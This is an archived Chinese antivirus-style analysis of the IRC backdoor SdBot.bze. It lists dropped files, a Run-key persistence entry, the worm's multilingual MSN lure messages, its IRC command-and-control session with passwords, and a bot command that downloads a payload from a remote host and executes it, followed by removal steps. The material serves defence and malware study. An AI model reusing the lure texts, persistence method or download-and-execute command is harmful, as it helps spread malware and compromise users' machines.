科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道Backdoor.Win32.SdBot.bze分析

Backdoor.Win32.SdBot.bze分析

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

该病毒运行后,衍生病毒副本到系统目录下,添加注册表自动运行项以跟随系统引导病毒体。病毒体判断本地是否有MSN 窗体存在,如有则向所有联系人发送病毒副本imag091307.zip。

作者:zdnet安全频道 来源:论坛整理 2008年6月20日

关键字: 后门 MSN机器人

  • 评论
  • 分享微博
  • 分享邮件

病毒名称: Backdoor.Win32.SdBot.bze
中文名称: MSN机器人
病毒类型: 后门类
文件 MD5: 13ABEB03D68EB64B08BA91E8181F9CC0
公开范围: 完全公开
危害等级: 5
文件长度: 脱壳前25,600 字节,脱壳后421,888 字节
感染系统: Win98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: UPX变形壳
 
病毒描述:
   该病毒运行后,衍生病毒副本到系统目录下,添加注册表自动运行项以跟随系统引导病
毒体。病毒体判断本地是否有MSN 窗体存在,如无则连接IRC服务器,接收指令下载病毒体到
本机运行,如有则向所有联系人发送病毒副本imag091307.zip。由于病毒体具有执行IRC指令
的功能,受感染用户可被控制下载任意程序到本机执行,极具危害性与传播性。
 
行为分析:
 本地行为:

1、文件运行后会衍生副本:

    %HomeDriver%\iadfd.exe
    %WinDri%\imag091307.zip
    %System32%\dllcache\winlogon.exe
    %Documents and Settings%\当前用户名\Local Settings\Temporary Internet     
    Files\Content.IE5\SP6V4TI3\skp[1].jpg

2、新增注册表:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "
    键值:winlogon
    字符串: " C:\WINDOWS\system32\dllcache\winlogon.exe "

3、如有MSN程序存在,则向联系人发送病毒副本imag091307.zip,此病毒测试用的MSN版本为
最新的8.1(Build 8.1 0178.00)。

 

4、随机选取文本信息以诱使联系人接收病毒体,病毒体内的字符序列如下:

    ZHE SHI WO DE LUOZHAO :o QING BU YAO FA GEI BIEREN !!.
    YI ZHANG WO GEN WO PENGYOU ZUI HAO DE ZHAOPIAN :s !!.
    JIESHOU WO DE ZHAO PIAN :> !!.
    KAN WO DE ZHAOPIAN :D.
    NI HE WO !!! .... QING KAN :D.
    kAN BA LI XI ER DUN JIN JIANYU HOU SHI DUO ME QIAOCUI :<.
    ay no ese pelo fue lo mas chistoso...q estabas pensando.
    jajaja yo me recuerdo cuando tuvistes el pelo asi.
    oye ponga esa foto en tu myspace como la foto principal.
    voy a poner esa foto de nosotros en mi blog ya.
    esa foto de tu y yo la voy a poner en myspace.
    hola esas son las fotos
    jaja debes poner esa foto como foto principal en tu myspace o algo :D
    oye voy a agregar esa foto a mi blog ya.
    jaja recuerda cuando tuviste el pelo asi.
    oye voy a poner esa foto de nosotros en mi myspace :>
    Per favore nessuno lasciare vede le nostre foto.
    Io ricordo quando abbiamo portato questa foto.
    Caricher questa foto al mio myspace adesso.
    Qui sono il fotos di ci.
    jaja lei dovrebbe fare quest'il suo pic predefinito sul myspace o
    qualcosa :Dmetta questi fotos in suo pagina myspace.
    ehi aggiunger quest'immagine di noi al mio weblog.
    jaja ricordo quando lei aveva i suoi capelli come questo.
    ehi metter quest'immagine di noi sul mio myspace :>
    chten den pics von meinen Ferien sehen?!?
    Wimmern! Blick auf diese alte Abbildung, die ich: fand!
    he ich zeige Ihnen diese Abbildung von mir berhaupt?
    Haha sollten Sie dieses Ihre R
    ckstellung auf myspace oder etwas pic bilden:D
    he werde ich diese Abbildung von uns meinem weblog hinzuf
    lol erinnern sich, an als Sie pflegten, Ihr Haar so zu haben!
    he werde ich diese Abbildung von uns auf mein myspace setzen!
    wil je fotos zien van mijn vakantie!
    wow! moet je eens kijken welke foto ik nu gevonden heb!
    he heb je ooit deze foto laten zien ?
    haha you moet die je standaard foto maken op hyves of myspace!
    hey ik voeg deze foto van ons ff toe op mijn weblog!
    lol ik kan me nog herrinneren toen je haar zoals dit had!
    Hey i zet deze foto van ons even op mijn myspace!
    faut de la reproduction sonore ! regard
    cette vieille image que j'ai trouve : |
    mes photos chaudes :D
    haha vous devriez rendre ceci votre d
    faut pic sur le myspace ou quelque chose :D
    j'ai fais pour toi ce photo album tu dois le voire :p
    veux tu voir mes image de vacance??
    le lol se rappellent quand vous aviez l'habitude d'avoir
    vos cheveux comme ceci
    je vais mettre cette image de nous sur mon myspace :>
    Check out my nice photo album. :D
    wanna see the pics from my vacation? :>
    Nice new photos of me and my friends and stuff and when i was young lol...
    lol remember when you used to have your hair like this
    My friend took nice photos of me.you Should see em loL!
    hey i'm going to add this picture of us to my weblog
    Here are my private pictures for you

网络行为:

(1)协议:IRC
    目的端口:21888
    域名或IP地址:(62.5.144.*** (俄罗斯))

(2)协议:IRC
    目的端口:21888
    域名或IP地址:(64.136.64.*** (美国))

Bot启动后与服务器的交互信息:
    PASS SireEnX       /*加入密码*/
    NICK [00|CHN|XP|144635] /*昵称名由一组病毒获取的本机信息字符序列组成*/
    USER XP-3039 * 0 :当前主机名
    :aaa.19594.com 001 [00|CHN|XP|144635]
    :lowkey, [00|CHN|XP|144635]!XP-
    3039@222.171.7.***
    :aaa.19594.com 005 [00|CHN|XP|144635]
    MAP KNOCK SAFELIST HCN MAXCHANNELS=500
    MAXBANS=60 NICKLEN=30 TOPICLEN=307
    KICKLEN=307 MAXTARGETS=15 AWAYLEN=307
    :are supported by this server
    :aaa.19594.com 005 [00|CHN|XP|144635]
    WALLCHOPS WATCH=128 SILENCE=15 MODES=12
    CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,
    kfL,l,psmntirRcOAQKVGCuzNSMT
    NETWORK=lowkey CASEMAPPING=ascii EXTBAN=~,cqr
    :are supported by this server
    :aaa.19594.com 422 [00|CHN|XP|144635]
    :MOTD File is missing
    :[00|CHN|XP|144635] MODE [00|CHN|XP|144635] :+i
    连接的IRC服务器列表:
    leaf.63***.com 221
    aaa.195**.com
    加入频道:#game
    #msn#
    频道密码:biGBlackCock
加入频道后接收指令下载病毒体:
    :aaa.195**.com 332 [00|CHN|XP|144635] #game
    :!ix.wget -S -s|!ix.wget
    http://www.autohou**india**.com/picts/picto.jpg
    c:\iadfd.exe r –s
    /*从指定地地址下载病毒体,衍生到c:\根目录下,
     并重命名为iadfd.exe ,立刻执行*/
本Bot支持下列标准IRC指令:
    UESE
    NICk
    PASS
    QUIT
    PING
    PONG
    PRIVMSG
    NOTICE
    PART
    JOIN
    MODE
    KICK
    TOPIC
    ……
从下列地址下载病毒体:
    www.autohou**india**.com(216.86.146.**) /picts/picto.jpg
    www.guilt****.com(72.52.71.***) /s3.0.exe

注: %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的
位置。
  
    %Windir%             WINDODWS所在目录
    %DriveLetter%          逻辑驱动器根目录
    %ProgramFiles%          系统程序默认安装目录
    %HomeDrive%           当前启动的系统的所在分区
    %Documents and Settings%    当前用户文档根目录
    %Temp%             \Documents and Settings
                    \当前用户\Local Settings\Temp
    %System32%           系统的 System32文件夹
    
    Windows2000/NT中默认的安装路径是C:\Winnt\System32
    windows95/98/me中默认的安装路径是C:\Windows\System
    windowsXP中默认的安装路径是C:\Windows\System32       
 
  

--------------------------------------------------------------------------------
清除方案:
  1 、使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
    (1)使用安天木马防线“进程管理”关闭病毒进程:
        %System32%\dllcache\winlogon.exe
    (2)删除病毒文件: 
        %HomeDriver%\iadfd.exe
        %WinDri%\imag091307.zip
        %System32%\dllcache\winlogon.exe
        %Documents and Settings%\当前用户名
        \Local Settings\Temporary Internet                
        Files\Content.IE5\SP6V4TI3\skp[1].jpg         
    (3)恢复病毒修改的注册表项目,删除病毒添加的注册表项。
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
        \Windows\CurrentVersion\Run
        键值:winlogon 字符串: "                
        C:\WINDOWS\system32\dllcache\winlogon.exe "

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章